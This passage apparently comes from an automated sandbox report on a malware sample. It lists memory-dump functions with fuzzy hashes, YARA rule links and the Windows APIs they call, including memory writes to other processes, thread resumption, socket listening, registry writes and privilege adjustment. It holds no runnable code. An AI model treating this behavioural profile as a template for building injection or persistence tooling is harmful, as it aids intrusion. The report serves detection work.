Opcode Fuzzy Hash: 4a93bd469f6d45f2a25ceb0dbfdd70c7741ec083ef7f30f037b3badadcda7d48
Instruction Fuzzy Hash: ED218471409384AFD722CB55DC55F96FFB8EF46320F0884DBE9849B292C264A949CB72

Uniqueness

Uniqueness Score: -1.00%

Function 04A20E9E, Relevance: 1.6, APIs: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

bind.WS2_32(?,00000E2C,353CADAB,00000000,00000000,00000000,00000000), ref: 04A20EFF

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: bind
String ID:
API String ID: 1187836755-0
Opcode ID: 664641a1e3a6b29e70072c29f68ecbdb01cd183c72ecf593b2fc2017e943d616
Instruction ID: d54f5ad1e6d6213ffa85bb44deb9f0bd8808cb2db54f32812530dc759d66bfd2
Opcode Fuzzy Hash: 664641a1e3a6b29e70072c29f68ecbdb01cd183c72ecf593b2fc2017e943d616
Instruction Fuzzy Hash: DB11BF71504204AFE720CF29DD84FA6FBA8EF44320F14C4ABEE499B241D674A845CB71

Uniqueness

Uniqueness Score: -1.00%

Function 04A25561, Relevance: 1.6, APIs: 1, Instructions: 60nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 04A255CC

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: 09684c3bff509c5a71c3ef2b2e9c0302be4df73680400e26edf5ca60303518cb
Instruction ID: 4e212bb386b516f2994e204ab7c719307a1cbc6aa672368a7391be89ea47e260
Opcode Fuzzy Hash: 09684c3bff509c5a71c3ef2b2e9c0302be4df73680400e26edf5ca60303518cb
Instruction Fuzzy Hash: 84117F71408384AFDB228F55DD44B62FFB4EF46220F08859AED849B112C275A959DB61

Uniqueness

Uniqueness Score: -1.00%

Function 04A20A8E, Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

listen.WS2_32(?,00000E2C,353CADAB,00000000,00000000,00000000,00000000), ref: 04A20AE4

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: listen
String ID:
API String ID: 3257165821-0
Opcode ID: 312a98fc71224512bd0289c3f84861c52e5cd269bfc5ac2c27ac1f31e9649cac
Instruction ID: b86661611ec81bd5070b630c3c39ca87942eed587f8ff8b3c42efb011dc90222
Opcode Fuzzy Hash: 312a98fc71224512bd0289c3f84861c52e5cd269bfc5ac2c27ac1f31e9649cac
Instruction Fuzzy Hash: 7011E571504204AFEB21DF19DD84F66FFA8EF45320F14C4ABEE049B241D674A805CB71

Uniqueness

Uniqueness Score: -1.00%

Function 04A22D72, Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

GetAdaptersInfo.IPHLPAPI(?,00000E2C,353CADAB,00000000,00000000,00000000,00000000), ref: 04A22DC8

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: AdaptersInfo
String ID:
API String ID: 3177971545-0
Opcode ID: 9d12df643e703746aba38ea8f82e998f8f4dbb368352a96f5ec25b633c50ac52
Instruction ID: c986c69516ec1dd3cd5af56523630a209dc3a83d305ca6dbbf2654ef3c17ae8b
Opcode Fuzzy Hash: 9d12df643e703746aba38ea8f82e998f8f4dbb368352a96f5ec25b633c50ac52
Instruction Fuzzy Hash: DB01C472500604EFEB20DF19DD85F66FFA8EF45720F1484ABEE449B281D6B4A405DB71

Uniqueness

Uniqueness Score: -1.00%

Function 04A24E52, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 04A24E9B

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: bfbe6456bd854a6215ede194c55f77095f943a20afcf3a4cc8ad72fd7abff85e
Instruction ID: 76a407419c70c148a612334a9cddee69ee635b6550df9e7b8fd0b757d4f57c5f
Opcode Fuzzy Hash: bfbe6456bd854a6215ede194c55f77095f943a20afcf3a4cc8ad72fd7abff85e
Instruction Fuzzy Hash: D6115E75500644DFEB60CF69DA84B96FBE8EF08620F08C4AADE458B651D271E818EB61

Uniqueness

Uniqueness Score: -1.00%

Function 04A2558E, Relevance: 1.5, APIs: 1, Instructions: 43nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 04A255CC

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: 8c6c523968341602ac369916f469ddb8405b44cfa2bb85a115f2eb62116d06ec
Instruction ID: 00c184a662929958c16eeedd8c95c928817a6417d22bbbc9b3113675632fb0b9
Opcode Fuzzy Hash: 8c6c523968341602ac369916f469ddb8405b44cfa2bb85a115f2eb62116d06ec
Instruction Fuzzy Hash: BB019E71800640EFDB20CF59D944B56FFE0FF08320F08C4AADE498B616D275A818EF62

Uniqueness

Uniqueness Score: -1.00%

Function 04A254E6, Relevance: 1.5, APIs: 1, Instructions: 40nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(?,?), ref: 04A2551B

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: f7015b1f405cc3fd196fdc1812e84707f7463c7e9556e8db6b6a5f51cb5cd741
Instruction ID: d4fc8316c892f8ca30baefe7874db97efd3da7c5f7dfe648b74a870f80763011
Opcode Fuzzy Hash: f7015b1f405cc3fd196fdc1812e84707f7463c7e9556e8db6b6a5f51cb5cd741
Instruction Fuzzy Hash: 0101AD71900640EFDB10CF19D984766FFA4EF48320F18C4AADE498F212D2B5A808DF62

Uniqueness

Uniqueness Score: -1.00%

Function 04A2543E, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 04A25479

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: bc78cf947953ea9da2e05fa24b4b0223a6184431a5fe6fd0a55a6df705e4fdf1
Instruction ID: 933d96833da1fe45d72c07bc3b1fc1dd761760d5d141b408a592f2c2dd8a2023
Opcode Fuzzy Hash: bc78cf947953ea9da2e05fa24b4b0223a6184431a5fe6fd0a55a6df705e4fdf1
Instruction Fuzzy Hash: 2001A231900A14EFDB20CF19D944B62FFA0FF04321F08C49ADE890B615D275A418EF72

Uniqueness

Uniqueness Score: -1.00%

Function 00C95B70, Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.326395711.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93733a26bf271c4244c89ffa42b52d7d3430dc847e31b20b8cd4103092378d94
Instruction ID: a9b459a506b4bf88d10697b70df8d0a81ec2f04983801ff6b8244272cce79efb
Opcode Fuzzy Hash: 93733a26bf271c4244c89ffa42b52d7d3430dc847e31b20b8cd4103092378d94
Instruction Fuzzy Hash: FE410670D02258CFDB55DFA9D848BEDBBB1BF49300F1494AAC408AB291D7349A85CF64

Uniqueness

Uniqueness Score: -1.00%

Function 04A22FED, Relevance: 3.1, APIs: 2, Instructions: 104COMMON

Download Yara Rule

APIs

GetAdaptersAddresses.IPHLPAPI(?,00000E2C,353CADAB,00000000,00000000,00000000,00000000), ref: 04A22F85
GetPerAdapterInfo.IPHLPAPI(?,00000E2C,353CADAB,00000000,00000000,00000000,00000000), ref: 04A23077

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: AdapterAdaptersAddressesInfo
String ID:
API String ID: 4108532965-0
Opcode ID: c941714bb81ce3e09ba28c17929e356e97033cb2311c5fd92c3d591ee649bac0
Instruction ID: 7aeb56cceed3af9baffd02485a02e368951ff3ced0bc781909989dd8954c0fac
Opcode Fuzzy Hash: c941714bb81ce3e09ba28c17929e356e97033cb2311c5fd92c3d591ee649bac0
Instruction Fuzzy Hash: AA312872009384AFD7128F24DD44F66FFB8EF46320F0884DBED448B292C225A518D772

Uniqueness

Uniqueness Score: -1.00%

Function 00C977E6, Relevance: 2.0, APIs: 1, Instructions: 473libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C97861

Memory Dump Source

Source File: 0000000A.00000002.326395711.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 86254bd17d6520549aa05dd78908a2088d96cb24f442cbeb3edf0b5fcd91e61c
Instruction ID: 18ade3542ba56d1695fdc582d95f9218b84b10d2bcffcffda0a663b1cb0f70e5
Opcode Fuzzy Hash: 86254bd17d6520549aa05dd78908a2088d96cb24f442cbeb3edf0b5fcd91e61c
Instruction Fuzzy Hash: 9632B074941229CFCB65DF24C994BEDB7B2BF4A304F5085EAD809AB254DB319E85CF80

Uniqueness

Uniqueness Score: -1.00%

Function 00C977F0, Relevance: 2.0, APIs: 1, Instructions: 465libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C97861

Memory Dump Source

Source File: 0000000A.00000002.326395711.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8d46f39681198fec1301c96731cef076ab34ff902e58abb76dcf4d3d543d10df
Instruction ID: 3274ca5867332becdb7c3b14868dece35a97abf372e8d347748d57d5d7cf25cc
Opcode Fuzzy Hash: 8d46f39681198fec1301c96731cef076ab34ff902e58abb76dcf4d3d543d10df
Instruction Fuzzy Hash: 3A32B074941229CFCB65DF24C994BEDB7B2BF4A304F5085EAD809AB254DB31AE85CF40

Uniqueness

Uniqueness Score: -1.00%

Function 00C98094, Relevance: 1.9, APIs: 1, Instructions: 438libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C97861

Memory Dump Source

Source File: 0000000A.00000002.326395711.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 180e7e4c96b002c152e752a95805aab8222269d2326e688894a922806157e1e2
Instruction ID: dd3002a2fac7f036b49a0c2ac49cb03db49e4d7b42e8768f2aaba34aed795968
Opcode Fuzzy Hash: 180e7e4c96b002c152e752a95805aab8222269d2326e688894a922806157e1e2
Instruction Fuzzy Hash: DB22A074941229CFCB65DF24C994BEDB7B2BF4A304F5085EAD809AB254DB31AE85CF40

Uniqueness

Uniqueness Score: -1.00%

Function 04A23B98, Relevance: 1.6, APIs: 1, Instructions: 145COMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(?,00000E2C), ref: 04A23CC7

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: getaddrinfo
String ID:
API String ID: 300660673-0
Opcode ID: 3c36b051028825699f91adaa58df0f1b62636b8f28f041f32fb4da2cfd088f4d
Instruction ID: bec38f6df874cb9481eb615513e14bbec9e7cb91d1d1ca0544afff70579bb6ba
Opcode Fuzzy Hash: 3c36b051028825699f91adaa58df0f1b62636b8f28f041f32fb4da2cfd088f4d
Instruction Fuzzy Hash: DE515C7100D3C06FE7238B248C65BA6BFB8AF07714F1A45DBE984DF1A3D2695909C762

Uniqueness

Uniqueness Score: -1.00%

Function 04A230B4, Relevance: 1.6, APIs: 1, Instructions: 127COMMON

Download Yara Rule

APIs

getnameinfo.WS2_32(?,00000E2C), ref: 04A231A5

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: getnameinfo
String ID:
API String ID: 1866240144-0
Opcode ID: 32c5b569dd6226909e2f75c7373ebe8a28b9def46b708129771e0fac0eee1f56
Instruction ID: ba35685326eb40d810dea61d6c540846d533a268abee0cca85c61de5665adfa4
Opcode Fuzzy Hash: 32c5b569dd6226909e2f75c7373ebe8a28b9def46b708129771e0fac0eee1f56
Instruction Fuzzy Hash: 8D419E720083846FEB12CB658C51FA6BFB8EF07310F0984DBE9818B1A3D624A909C771

Uniqueness

Uniqueness Score: -1.00%

Function 04A23392, Relevance: 1.6, APIs: 1, Instructions: 114networkCOMMON

Download Yara Rule

APIs

WSAIoctl.WS2_32(?,00000E2C,353CADAB,00000000,00000000,00000000,00000000), ref: 04A23479

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: Ioctl
String ID:
API String ID: 3041054344-0
Opcode ID: 179c8eb1b6ee45e583369131ac18b1f24d1c1c3d507b09551edc337dc7999982
Instruction ID: 48450296e8bfc1c59d2d4d51f225e90af54b591226f6364221db6aee9a6db283
Opcode Fuzzy Hash: 179c8eb1b6ee45e583369131ac18b1f24d1c1c3d507b09551edc337dc7999982
Instruction Fuzzy Hash: 03413E7140D7C06FD7238B648C54E52BFB8AF07210F0985DBE985CF1A3D229A849DB72

Uniqueness

Uniqueness Score: -1.00%

Function 04A252AC, Relevance: 1.6, APIs: 1, Instructions: 112processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,00000E2C), ref: 04A253A4

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: e291ece18227a96677a0d7d29f2cf0dff03ac43f2aede234afeb2a821d58205a
Instruction ID: a94f8539b78ff52d1a48fc15352b04d5137ca4403d11db60b147964bec92d3e6
Opcode Fuzzy Hash: e291ece18227a96677a0d7d29f2cf0dff03ac43f2aede234afeb2a821d58205a
Instruction Fuzzy Hash: 4F418072504340AFEB21CF65CC41FA7BBECEF05710F0489AAFA859A191D2B1F945CB60

Uniqueness

Uniqueness Score: -1.00%

Function 04A2368A, Relevance: 1.6, APIs: 1, Instructions: 110registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000E2C), ref: 04A23741

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 5afdf7203a1ab393c51e64af3362c2ecd1fef538e4358b5ab73bcf5e8606c7a0
Instruction ID: f27e9da463b112046ea0060557472cc09fb3330118bd526b7f0f1eb5998dbac7
Opcode Fuzzy Hash: 5afdf7203a1ab393c51e64af3362c2ecd1fef538e4358b5ab73bcf5e8606c7a0
Instruction Fuzzy Hash: 123193B1408384AFEB12CF64DC54FA6BFBCEF46310F08859BE9859F153D264A909DB61

Uniqueness

Uniqueness Score: -1.00%

Function 04A2207C, Relevance: 1.6, APIs: 1, Instructions: 106COMMON

Download Yara Rule

APIs

RasEnumConnectionsW.RASAPI32(?,00000E2C,?,?), ref: 04A2215A

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: ConnectionsEnum
String ID:
API String ID: 3832085198-0
Opcode ID: 49e9efe05fc8973e81e9c2a6c0629275542a41eae823a056c91e2cd1a70b069e
Instruction ID: 3a30c764b7c39e9dc8a8041b7e777b19dcaa1716e18dc6a191e80f75214638a9
Opcode Fuzzy Hash: 49e9efe05fc8973e81e9c2a6c0629275542a41eae823a056c91e2cd1a70b069e
Instruction Fuzzy Hash: EB315E7540E3C05FD7138B358C65AA1BFB4EF87614F0A45DBE8848F1A3D2686909CB72

Uniqueness

Uniqueness Score: -1.00%

Function 04A24936, Relevance: 1.6, APIs: 1, Instructions: 102registryCOMMON

Download Yara Rule

APIs

RegSetValueExW.KERNEL32(?,00000E2C,353CADAB,00000000,00000000,00000000,00000000), ref: 04A24A00

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: adfee5972b7280061f724a594fb260dc2e6180c25e2792b2639f2126738cdc41
Instruction ID: 4d8642a8416c5b438a6f381ae9434881aff6098d513ee1eb742c89203c1fa387
Opcode Fuzzy Hash: adfee5972b7280061f724a594fb260dc2e6180c25e2792b2639f2126738cdc41
Instruction Fuzzy Hash: 30315D7110E3C06FD7238B249C60B52BFB89F07610F0985DBE985DB1A3D268A849CB72

Uniqueness

Uniqueness Score: -1.00%

Function 04A252DA, Relevance: 1.6, APIs: 1, Instructions: 97processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,00000E2C), ref: 04A253A4

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 4e2f6579f0eee3f07fcbff735f1170e4245dbc41652feddd8378f358b2d53756
Instruction ID: e426bd54b23ed77b0eb5b1c9ffe74f4c649b462d119680f6b808842e9567bda9
Opcode Fuzzy Hash: 4e2f6579f0eee3f07fcbff735f1170e4245dbc41652feddd8378f358b2d53756
Instruction Fuzzy Hash: 2F318E71500600BFEB31CF65CD81FA7BBE8EF08710F14896AEA458A191D6B1F905DB60

Uniqueness

Uniqueness Score: -1.00%

Function 04A23205, Relevance: 1.6, APIs: 1, Instructions: 97encryptionCOMMON

Download Yara Rule

APIs

CertGetCertificateChain.CRYPT32(?,00000E2C,?,?), ref: 04A232CE

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: CertCertificateChain
String ID:
API String ID: 3019455780-0
Opcode ID: e5859eb1cc0cf1bafaf19eb3bc7fae9259bc65094e2f332684b22f0286ab92a8
Instruction ID: faaf0d09bf945e9444319eefbafb459caafe0504ca158a94889f286dd5a15fc9
Opcode Fuzzy Hash: e5859eb1cc0cf1bafaf19eb3bc7fae9259bc65094e2f332684b22f0286ab92a8
Instruction Fuzzy Hash: 52317C7150E3C05FD7038B758C61B66BFB49F87610F1E80CBD8848F2A3E624691AC7A2

Uniqueness

Uniqueness Score: -1.00%

Function 04A2388A, Relevance: 1.6, APIs: 1, Instructions: 92registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000E2C), ref: 04A23936

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 885e2a6aa451e10cfabda7c174b293090c5d35bfdbfcf034fa8ccce5739c0fef
Instruction ID: 4055093ec292a75dd6569b9c67b1f04e067ef7f1d4b9f8f2533f15605ebea486
Opcode Fuzzy Hash: 885e2a6aa451e10cfabda7c174b293090c5d35bfdbfcf034fa8ccce5739c0fef
Instruction Fuzzy Hash: 6231A4B1505784AFEB228F24DC54F66FFB8EF46310F08849BED849B153D264A909C771

Uniqueness

Uniqueness Score: -1.00%

Function 04A20C18, Relevance: 1.6, APIs: 1, Instructions: 90timeCOMMON

Download Yara Rule

APIs

GetProcessTimes.KERNEL32(?,00000E2C,353CADAB,00000000,00000000,00000000,00000000), ref: 04A20CB5

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: ProcessTimes
String ID:
API String ID: 1995159646-0
Opcode ID: 278bcf58ae24da364ac3ac7506b8d7b97047a2b1a46355a45f8cef02ed63bdda
Instruction ID: b06b1c5d6f8872d40c42e268159e76c3abec677e5e22b9d39507bf44fc582f37
Opcode Fuzzy Hash: 278bcf58ae24da364ac3ac7506b8d7b97047a2b1a46355a45f8cef02ed63bdda
Instruction Fuzzy Hash: DE31C5B2509380AFEB128F24DC55F96BFB8EF46314F0884DBEA859B153C225A905D771

Uniqueness

Uniqueness Score: -1.00%

Function 04A21109, Relevance: 1.6, APIs: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

accept.WS2_32(?,?), ref: 04A211AD

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: accept
String ID:
API String ID: 3005279540-0
Opcode ID: 84be50f6c364fe14c92cb032d12929b1f25feb6c15e35013a6eaf1496abe6160
Instruction ID: d54ab42bca22814262fadb769bc102d268f3e2eb5c792bc7962d16d01f702dd5
Opcode Fuzzy Hash: 84be50f6c364fe14c92cb032d12929b1f25feb6c15e35013a6eaf1496abe6160
Instruction Fuzzy Hash: 76317EB1509780AFE712CB25DC44F96FFB8EF06214F08849AE9849B253D375A909CB61

Uniqueness

Uniqueness Score: -1.00%

Function 04A2310E, Relevance: 1.6, APIs: 1, Instructions: 90COMMON

Download Yara Rule

APIs

getnameinfo.WS2_32(?,00000E2C), ref: 04A231A5

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: getnameinfo
String ID:
API String ID: 1866240144-0
Opcode ID: 508ee63c378ba538c1dc7fb4dd1f314dce9c95f1722d9b0b4294aba027986bcd
Instruction ID: a2a9a3dde4dad582666d24a52545550212fc0fedbaaf9012ad065ba7d5f566a7
Opcode Fuzzy Hash: 508ee63c378ba538c1dc7fb4dd1f314dce9c95f1722d9b0b4294aba027986bcd
Instruction Fuzzy Hash: BE218E72500304AFEB20CF69CD85FAAFBACEF05710F04896AEE46DA241D664E549CB71

Uniqueness

Uniqueness Score: -1.00%

Function 04A213C1, Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

CreateFileMappingW.KERNELBASE(?,00000E2C,?,?), ref: 04A2146E

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: CreateFileMapping
String ID:
API String ID: 524692379-0
Opcode ID: 1792ef3b900a5e27b7d3dd3cf09d4f2ec2b4fce74ffda88db286bf453d22fb7f
Instruction ID: 93ad6f58f0c6128d66ca23ceb1cb054019ea6b99d2617a8f2663236310ac5ae3
Opcode Fuzzy Hash: 1792ef3b900a5e27b7d3dd3cf09d4f2ec2b4fce74ffda88db286bf453d22fb7f
Instruction Fuzzy Hash: D331C5715093C06FD3138B25DC55F62BFB8EF87610F0A81DBE8848F593D224A90AC7A1

Uniqueness

Uniqueness Score: -1.00%

Function 04A205CC, Relevance: 1.6, APIs: 1, Instructions: 87fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNEL32 ref: 04A2067E

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: 50e2f74cc57b9519a8ae68322e1ce46b8f575534ded1aee635cdd68c46e09398
Instruction ID: 52331f57b2861268bf38e9240be90b257e2f657b98d54e26c2711d12c3b9063c
Opcode Fuzzy Hash: 50e2f74cc57b9519a8ae68322e1ce46b8f575534ded1aee635cdd68c46e09398
Instruction Fuzzy Hash: 8231D4B2404780AFE722CF55DC45F96FFF8EF06320F04859AE9849B262D375A909CB61

Uniqueness

Uniqueness Score: -1.00%

Function 04A24EE8, Relevance: 1.6, APIs: 1, Instructions: 86COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(?,00000E2C,353CADAB,00000000,00000000,00000000,00000000), ref: 04A24F7E

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: EnumModulesProcess
String ID:
API String ID: 1082081703-0
Opcode ID: fc44d41bce13e4e3a5d891c7cafd71dd4e791d84e409d0817f084907cb907603
Instruction ID: 36617928980dcfaf2de806c38c522f39e62c6bdf964831de2b13bbd788454b22
Opcode Fuzzy Hash: fc44d41bce13e4e3a5d891c7cafd71dd4e791d84e409d0817f084907cb907603
Instruction Fuzzy Hash: 5D21A2725093806FEB12CF25DC55F96BFA8EF46710F0884DBE9849F152C264A909CB61

Uniqueness

Uniqueness Score: -1.00%

Function 04A2666F, Relevance: 1.6, APIs: 1, Instructions: 85encryptionCOMMON

Download Yara Rule

APIs

CertVerifyCertificateChainPolicy.CRYPT32(?,00000E2C,353CADAB,00000000,00000000,00000000,00000000), ref: 04A26706

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: CertCertificateChainPolicyVerify
String ID:
API String ID: 3930008701-0
Opcode ID: 4e51b6e42c77d28c14f8de8acf00bace0570c24c987ace57d5f3204d7470cc62
Instruction ID: e1466e8806656d19a1878609614f707e02bb4a7a07e0cbef4bc23669cb129cf8
Opcode Fuzzy Hash: 4e51b6e42c77d28c14f8de8acf00bace0570c24c987ace57d5f3204d7470cc62
Instruction Fuzzy Hash: 6C21B4B1109780AFE7128F24DC54F56BFB8EF06320F0884EBE985DF192D225A809CB71

Uniqueness

Uniqueness Score: -1.00%

Function 04A20959, Relevance: 1.6, APIs: 1, Instructions: 85synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNEL32(?,?), ref: 04A209F9

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 0135f66a05b97191ef19db027ada10c5180f6d06bd27e0250b64062b2b9b4361
Instruction ID: 141c60cbbb9a5ea038c5ff267ab09d92ba370007dfdafe1723ee0c8c7d8da7fa
Opcode Fuzzy Hash: 0135f66a05b97191ef19db027ada10c5180f6d06bd27e0250b64062b2b9b4361
Instruction Fuzzy Hash: 323161B1509380AFE722CF65CD45F56FFE8EF45310F08849AEA899B292D375E904CB61

Uniqueness

Uniqueness Score: -1.00%

Function 04A23C22, Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(?,00000E2C), ref: 04A23CC7

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: getaddrinfo
String ID:
API String ID: 300660673-0
Opcode ID: ae077d4e1d4588699735b3669396e927147c85941bd18b2ee493e76186bb99b1
Instruction ID: 1840a3c7fdf8b10b68d66be33c29da579d50d5ae0a94451a5620313489357fd4
Opcode Fuzzy Hash: ae077d4e1d4588699735b3669396e927147c85941bd18b2ee493e76186bb99b1
Instruction Fuzzy Hash: C621D171100304BFFB20DF24CC85FAAFBACEF44710F10885AFE459A281D6B4A9098BB1

Uniqueness

Uniqueness Score: -1.00%

Function 04A2359C, Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON

Download Yara Rule

APIs

RegOpenCurrentUser.KERNEL32(?,00000E2C), ref: 04A23635

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: CurrentOpenUser
String ID:
API String ID: 1571386571-0
Opcode ID: 2d94c020c0dc7a0e1f1a76b568826304b73f977a4a9ce71f721c7d2b112a840e
Instruction ID: eefd1df984461869294e81c3b08d34721a956595050d5b78c8042922054eea5f
Opcode Fuzzy Hash: 2d94c020c0dc7a0e1f1a76b568826304b73f977a4a9ce71f721c7d2b112a840e
Instruction Fuzzy Hash: 5221B171409384AFEB128B24DC45F66BFB8EF46310F0984DBED849F253D264A909CB71

Uniqueness

Uniqueness Score: -1.00%

Function 04A24FDD, Relevance: 1.6, APIs: 1, Instructions: 82COMMON

Download Yara Rule

APIs

K32GetModuleInformation.KERNEL32(?,00000E2C,353CADAB,00000000,00000000,00000000,00000000), ref: 04A2506E

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: InformationModule
String ID:
API String ID: 3425974696-0
Opcode ID: 76588e6b1f2f45bc2a02c777e3380807eff0cc81a4c54c7f3cca1c2f31fda9a3
Instruction ID: 0b81397eba5757133f280f0f4a1cdf40bb3a725dc5bda9eafc6e36b12a9d166f
Opcode Fuzzy Hash: 76588e6b1f2f45bc2a02c777e3380807eff0cc81a4c54c7f3cca1c2f31fda9a3
Instruction Fuzzy Hash: B621A371509380AFE722CF25DC54F66BFA8EF46310F0884ABE945DB252D264E908CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 04A250D4, Relevance: 1.6, APIs: 1, Instructions: 81COMMON

Download Yara Rule

APIs

K32GetModuleFileNameExW.KERNEL32(?,00000E2C,?,?), ref: 04A2517A
